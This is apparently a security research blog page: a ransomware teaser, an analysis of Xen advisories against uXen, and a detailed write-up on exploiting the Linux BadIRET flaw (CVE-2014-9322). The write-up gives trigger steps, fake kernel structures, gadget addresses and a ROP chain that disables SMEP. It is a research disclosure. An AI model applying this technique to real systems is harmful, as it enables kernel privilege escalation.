Achievement Locked: New Crypto-Ransomware Pwns Video Gamers

Gamers may be used to paying to unlock downloadable content in their favorite games, but a new crypto-ransomware variant aims to make gamers pay to unlock what they already own. Data files for more than 20 games can be affected by the threat, increasing what is already a large target for cybercriminals. Another file type that hasn’t been targeted before is iTunes related. But first, let’s have a look at the initial infection.

Read more…

March 10, 2015 / Rafal Wojtczuk

The five Xen Security Advisories from March 2015 and Bromium vSentry

Five Xen hypervisor security advisories – XSA-120, XSA-121, XSA-122, XSA-123 and XSA-124 – have been published recently. Let’s have a look at how they relate to the Bromium vSentry hypervisor, uXen, which has been derived from Xen.

Summary of impact on uXen

XSA-120 – not vulnerable
XSA-121 – minor data disclosure
XSA-122 – minor data disclosure
XSA-123 – not vulnerable
XSA-124 – not vulnerable

XSA-120 and XSA-124

These vulnerabilities are related to PCI-passthrough functionality. If a malicious VM has been granted direct access to a PCI device, it can crash the host. Currently, in Bromium vSentry we do not pass any PCI devices to any VM, therefore these vulnerabilities are not relevant.


XSA-121

The code responsible for emulating some hardware (e.g. the real-time clock and the interrupt controller) refuses to handle unexpected requests from the VM. Unfortunately, the upper layers of the emulator still return 4 bytes of uninitialized data to the VM, despite the fact that this location has not been filled by the lower layer of the code. This results in a limited information disclosure – four bytes from the hypervisor address space are disclosed to the VM. These four bytes reside on the hypervisor stack. Therefore, the impact is minimal – the only information useful to an attacker is the partial value of pointers residing on the stack. This is not interesting by itself, but it might be helpful when exploiting another (unrelated) vulnerability based on memory corruption, because it makes ASLR protection ineffective.
uXen is potentially vulnerable to this issue.


XSA-122

This issue is very similar to XSA-121. This time, limited disclosure of the contents of the hypervisor’s stack occurs when handling the “xen_version” hypercall. The impact is identical to XSA-121 (the difference is that more than 4 bytes can be disclosed).
uXen is potentially vulnerable to this issue.


XSA-123

This is the most interesting one of the five, because it is a hypervisor memory corruption. The discoverer’s analysis is here; the below independent analysis is essentially the same, with a few extra bits on the CPU0 case.
The vulnerability lies in the code responsible for instruction emulation. The Xen emulator maintains the following data structure (C union):
union {
/* OP_REG: Pointer to register field. */
unsigned long *reg;
/* OP_MEM: Segment and offset. */
struct { enum x86_segment seg; unsigned long off; } mem;
};

If the instruction accesses memory, then the “mem” field of the union should be used. If the instruction accesses a register, then the “reg” pointer should be used – it points to the stored register on the hypervisor stack. The problem arises when Xen emulates an instruction that does not access memory, but is prefixed by a segment override prefix (naturally, such a combination does not make sense). In such a case, the “reg” pointer is first initialized to a legal location, but then the “mem.seg” field is also written to. As both fields (“reg” and “seg”) share the same location (this is how C unions work), the result is that the “reg” pointer is corrupted. Subsequently, this pointer is read from or written to, with an attacker-controllable value.
The crucial limitation is that the “reg” pointer is 8 bytes long (assuming the x86-64 architecture) and the “seg” field is 4 bytes long (unless the “-fshort-enums” option is passed to the compiler, but that does not seem to be the case, at least by default). This means that only the low 4 bytes of “reg” can be controlled, and with a very limited range of values. The largest possible value of the “enum x86_segment” type that can come from a prefix is 5. If the original value of “reg” was 0xXXXXXXXXYYYYYYYY, we can turn it into 0xXXXXXXXX0000000Z, where Z is in the 0-5 range (and the high 32 bits are unchanged). Initially, the “reg” field points to the hypervisor stack. In order to understand the impact, we need to know the possible ranges of the hypervisor stack locations. The following information was gathered on a Xen-4.4.1 x86-64 system (in particular, the file xen-4.4.1/xen/include/asm-x86/config.h is very helpful). There are two cases:
1) An attacker controls a VM that can run on physical CPU 0. The stack for CPU 0 resides in the Xen image bss section, so it is located at an address a bit higher than 0xffff82d080000000. After the overwrite, this pointer will have the value 0xffff82d00000000Z (again, 0<=Z<=5). This virtual address is mapped and belongs to the compatibility machine-to-phys translation table. This data structure is used only for PV VMs (while the vulnerability can only be triggered from an HVM), therefore (most likely) an attacker needs to control both a PV VM and an HVM to proceed. Even in this case, it is unclear how the ability to control the first entry of the machine-to-phys translation table can help an attacker.
2) An attacker controls a VM that cannot run on physical CPU 0. Hypervisor stacks for CPUs other than 0 are allocated on the Xen heap. The typical address of the stack top is 0xffff830000000000+physical_memory_size-something_small, because memory for CPU stacks is allocated early at Xen boot time, from the top of physical memory (and all physical memory is mapped at the virtual address 0xffff830000000000). After the vulnerability is triggered, the “reg” pointer will have the value 0xffff830V0000000Z, where again 0<=Z<=5, and V=(int)(physical_memory_size_in_GB/4.0). This address is mapped to a single physical frame that can serve any purpose – e.g. it can be used by the dom0 kernel to store crucial pointers. However, it is nontrivial for a malicious VM to force the hypervisor to allocate this frame in a way that would result in reliable privilege escalation. On the other hand, uncontrolled memory corruption in another VM (limited to a single page) is likely.
The good news is that uXen is not vulnerable to this issue. We identified the Xen instruction emulator as a possible attack target a long time ago, and its functionality in uXen is severely limited. Particularly, uXen (when running a microVM) refuses to emulate an instruction with a segment override – if such an instruction is seen, the microVM is killed.

February 2, 2015 / Rafal Wojtczuk

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)


CVE-2014-9322 is described as follows:

arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
properly handle faults associated with the Stack Segment (SS) segment
register, which allows local users to gain privileges by triggering an IRET
instruction that leads to access to a GS Base address from the wrong space. 

It was fixed on 23rd November 2014 with this commit.
I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there.
All experiments were conducted on a Fedora 20 system running the 64-bit 3.11.10-301 kernel; all the discussion is 64-bit-specific.

Short results summary:

  1. With the tested kernel, the vulnerability can be reliably exploited to achieve kernel-mode
    arbitrary code execution.

  2. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution.

Digression: kernel, usermode, iret

The vulnerability

In a few cases, when the Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to the bad_iret function, which does

     /* So pretend we completed the iret and took the #GPF in user mode.*/
     pushq $0
     jmp general_protection

As the comment explains, the subsequent code flow should be identical to the case when a
general protection exception happens in user mode (just jump to the #GP handler). This works well for most of the exceptions that can be raised by iret, e.g. #GP.

The problematic case is the #SS exception. If a kernel is vulnerable (so, before kernel version 3.17.5) and has the “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – the “push” instruction generates a page fault that gets converted into a double fault. I have not analysed this scenario; from now on, we focus on a pre-3.16 kernel, with no “espfix”.

The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. the #GP handler, the #SS exception handler executes one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the below paragraph; otherwise skip it.

Digression: swapgs instruction

When memory is accessed with gs segment prefix, like this:

mov %gs:LOGICAL_ADDRESS, %eax

the following actually happens:

  1. BASE_ADDRESS value is retrieved from the hidden part of the segment register
  2. memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced

The base address is initially derived from the Global Descriptor Table (GDT) or the LDT. However, there are situations where the GS segment base is changed on the fly, without involving the GDT.

Quoting SDM:
“SWAPGS exchanges the current GS base register value with the value contained
in MSR address C0000102H
(IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction
intended for use by system software. (…) The kernel can then use the GS prefix on
normal memory references to access [per-cpu] kernel data structures.”
For each CPU, Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure address. Therefore, the usual pattern of e.g. syscall handler is:

  1. swapgs (now the gs base points to kernel memory)
  2. access per-cpu kernel data structures via memory instructions with gs prefix
  3. swapgs (it undoes the result of the previous swapgs, gs base points to usermode memory)
  4. return to usermode

Naturally, kernel code must ensure that whenever it wants to access per-cpu data with the gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is odd (so that the gs base points to kernel memory).

Triggering the vulnerability

By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, the kernel will try to access important data structures with a wrong gs base, controllable by the user.
When is #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of iret instruction, it says:

 64-Bit Mode Exceptions:
 If an attempt to pop a value off the stack violates the SS limit.
 If an attempt to pop a value off the stack causes a non-canonical address
 to be referenced.

None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present:

IF stack segment is not present
THEN #SS(SS selector); FI;

So, in usermode, we need to set the ss register to something not present. It is not straightforward: we cannot just use

mov $nonpresent_segment_selector, %eax
mov %ax, %ss

as the latter instruction will generate #GP. Setting ss via a debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on a 64-bit system (it might work on 32-bit, though). The solution is:

  1. thread A: create a custom segment X in LDT via sys_modify_ldt syscall
  2. thread B: ss:=X_selector
  3. thread A: invalidate X via sys_modify_ldt
  4. thread B: wait for hardware interrupt

The reason why one needs two threads (both in the same process) is that the return from a syscall (including sys_modify_ldt) is done via the sysret instruction, which hardcodes the ss value. If we invalidated X in the same thread that executed the “ss:=X” instruction, the ss value would be reset on return from the syscall.
Running the above code results in a kernel panic. In order to do something more meaningful, we will need to control the usermode gs base; it can be set via the arch_prctl(ARCH_SET_GS) syscall.

Achieving write primitive

If we run the above code, then the #SS handler runs fine (meaning: it will not touch memory at the gs base) and returns into bad_iret, which in turn jumps to the #GP exception handler. This runs fine for a while, and then calls the following function:

289 dotraplinkage void
290 do_general_protection(struct pt_regs *regs, long error_code)
291 {
292         struct task_struct *tsk;
306         tsk = current;
307         if (!user_mode(regs)) {
                ... it is not reached
317         }
319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;
322         if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) &&
323                         printk_ratelimit()) {
324                 pr_info("%s[%d] general protection ip:%lx sp:%lx error:%lx",
325                         tsk->comm, task_pid_nr(tsk),
326                         regs->ip, regs->sp, error_code);
327                 print_vma_addr(" in ", regs->ip);
328                 pr_cont("\n");
329         }
331         force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk);
332 exit:
333         exception_exit(prev_state);
334 }

It is far from obvious from the C code, but the assignment to tsk from the current macro uses a memory read with the gs prefix. Line 306 is actually:

0xffffffff8164b79d :	mov    %gs:0xc780,%rbx

This gets interesting. We control the “current” pointer, which points to the giant data structure describing the whole Linux process. In particular, the lines

319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;

are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are the constants 0 and 0xd, respectively), but this should not be a problem. Game over?

Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps:

  1. prepare usermode memory at FAKE_PERCPU, and set gs base to it
  2. Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET= X – offsetof(struct task_struct, thread.error_code)
  3. trigger the vulnerability

Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. the unhandled_signal() function dereferences a pointer from task_struct. We have no control over what lies beyond X, and the result will be a page fault in the kernel.
How can we cope with this? Options:

  1. Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately).
    This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes.

  2. Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before.
    This does not work, either, for two reasons:

    • Linux makes IDT read-only (bravo!)
    • even if the IDT were writable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDs of the IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being a useful stack pivot sequence are negligible.
  3. We can try a race. Say the “tsk->thread.error_code = error_code” write facilitates code
    execution, e.g. allows us to control a code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm.
    I tried this approach a couple of times, with no luck; perhaps with different vulnerability the timings would be different and it would work better.

  4. Throw in the towel on the “tsk->thread.error_code = error_code” write.

With some disgust, we will follow the last option. We will point “current” to a usermode location, setting the pointers in it so that the read dereferences through them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.

Achieving write primitive continued, aka life after do_general_protection

Our next chance is the function called by do_general_protection():

int
force_sig_info(int sig, struct siginfo *info, struct task_struct *t)
{
        unsigned long int flags;
        int ret, blocked, ignored;
        struct k_sigaction *action;

        spin_lock_irqsave(&t->sighand->siglock, flags);
        action = &t->sighand->action[sig-1];
        ignored = action->sa.sa_handler == SIG_IGN;
        blocked = sigismember(&t->blocked, sig);
        if (blocked || ignored) {
                action->sa.sa_handler = SIG_DFL;
                if (blocked) {
                        sigdelset(&t->blocked, sig);
                        recalc_sigpending_and_wake(t);
                }
        }
        if (action->sa.sa_handler == SIG_DFL)
                t->signal->flags &= ~SIGNAL_UNKILLABLE;
        ret = specific_send_sig_info(sig, info, t);
        spin_unlock_irqrestore(&t->sighand->siglock, flags);

        return ret;
}

The field “sighand” in task_struct is a pointer that we can set to an arbitrary value. It means that the

action = &t->sighand->action[sig-1];
action->sa.sa_handler = SIG_DFL;

lines are another chance for a write primitive to an arbitrary location. Again, we do not control the written value – it is the constant SIG_DFL, equal to 0.
This finally works, hurray! With a little twist. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly the sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is the line

spin_lock_irqsave(&t->sighand->siglock, flags);

As t->sighand->siglock is at a constant offset from t->sighand->action[sig-1].sa.sa_handler, the kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose contents we do not control. What happens then?
There are two possibilities:

  1. memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good.
  2. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react.
    This is worrying. In order to bypass this, we will need another assumption – we will need to know that we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we set X to be in the kernel .data section. We will do the following:

    • initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE
    • force_sig_info() will hang in spin_lock_irqsave
    • at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE
    • spin_lock_irqsave will return.
    • force_sig_info() will reload t->sighand, and perform the desired write.

A careful reader is encouraged to enquire why we cannot use the latter approach in the case where X+SPINLOCK is initially unlocked.
This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because the usermode ss value on the stack still refers to a non-present segment). But this time, the extra swapgs instruction in the #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on the real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable.


Digression: SMEP

SMEP is a feature of Intel processors, starting from the 3rd generation of Core processors. If the SMEP bit is set in CR4, the CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available.

Achieving code execution

The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled?
Overwriting a kernel code pointer would not work. We could nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent a dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to a useful stack pivot sequence are low.
What we need is a kernel pointer P to a structure X that contains code pointers. We can overwrite the top bytes of P so that the resulting address is in usermode, and a P->code_pointer_in_x() call will jump to a location that we can choose.
I am not sure what the best object to attack is. For my experiments, I chose the kernel proc_root variable. It is a structure of type

struct proc_dir_entry {
        const struct inode_operations *proc_iops;
        const struct file_operations *proc_fops;
        struct proc_dir_entry *next, *parent, *subdir;
        u8 namelen;
        char name[];
};

This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called:

struct inode_operations {
        struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int);
        void * (*follow_link) (struct dentry *, struct nameidata *);
        ...many more...
        int (*update_time)(struct inode *, struct timespec *, int);
} ____cacheline_aligned;

proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline; along with tens of offsets required to build FAKE_CURRENT.
So, we will overwrite proc_root.subdir so that it becomes a pointer to a controlled struct
proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to:

  1. map 16MB of memory at address 4096
  2. fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to the usermode address FAKE_IOPS, and the name field being the string “A”.
  3. configure the exploit to overwrite the top 5 bytes of proc_root.subdir

Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info(), proc_root.subdir will point to controlled usermode memory. When our process calls open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to?
If you think the answer is “to our shellcode”, go back and read again.

We will need to point the FAKE_IOPS pointers to a stack pivot sequence. This again assumes knowledge of the precise version of the running kernel. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in the case of the tested kernel) works very well for 64-bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32-bit registers, thus clearing the high 32 bits of %rsp and landing %rsp in usermode memory. In the worst case, we may need to allocate the low 4GB of virtual memory and fill it with the rop chain.
In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed:

  1. %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax)
  2. %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax

In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the rop chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of FAKE_IOPS pointers.
In the second case, %rsp will be assigned the low 32 bits of the call target, so 0x8119f1ed. We need to prepare the rop chain at this address as well.
To sum up, as the %rax value has one of two known values at the moment of the entry to the stack pivot sequence, we do not need to fill the whole 4G with rop chain, just the above two addresses.
The ROP chain itself is straightforward, shown for the second case:

unsigned long *stack = (unsigned long *)0x8119f1edULL;
*stack++ = 0xffffffff81307bcdULL;  // pop %rdi; ret
*stack++ = 0x407e0;                // cr4 value with the SMEP bit cleared
*stack++ = 0xffffffff8104c394ULL;  // mov %rdi, %cr4; pop %rbp; ret
*stack++ = 0xaabbccdd;             // placeholder for %rbp


Digression: SMAP

SMAP is a feature of Intel processors, starting from the 5th generation of Core processors. If the SMAP bit is set in CR4, the CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on a system with a Core-M 5Y10a CPU) that tries to access usermode crashes with:

[  314.099024] running with cr4=0x3407e0
[  389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000
[  389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest]
[  389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867
[  389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b 

As we can see, although the usermode page is present, access to it throws a page fault.
Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (that was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in case of Linux, access to usermode is performed explicitely, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in the exception handler, so it is more difficult to adjust all the drivers in all required places to work properly with SMAP.

SMAP to the rescue!

The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – CPU will refuse to read malicious data from usermode.
What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does

write(pipe_filedescriptor, evil_data, ...

then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.
However, there is one more hurdle – remember, we need to set usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used arch_prctl(ARCH_SET_GS) syscall, that is implemented in the following way in the kernel:

long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
{
         int ret = 0;
         int doit = task == current;
         int cpu;

         switch (code) {
         case ARCH_SET_GS:
                 if (addr >= TASK_SIZE_OF(task))
                         return -EPERM;
                 ... honour the request otherwise

Houston, we have a problem – we cannot use this API to set the gs base above the end of usermode memory!
Recent CPUs feature the wrgsbase instruction, which sets the gs base directly. It is a nonprivileged instruction, but it needs to be enabled by the kernel by setting the FSGSBASE bit (bit 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction.

On 64-bit, non-system entries in the GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, there is no way to set up a segment with a base address in kernel space.
So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322.

